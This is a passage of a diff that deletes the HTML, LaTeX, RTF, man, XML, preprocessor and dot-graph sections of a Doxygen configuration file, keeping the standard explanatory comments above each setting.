-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = NO
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             =
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = YES
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = NO
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
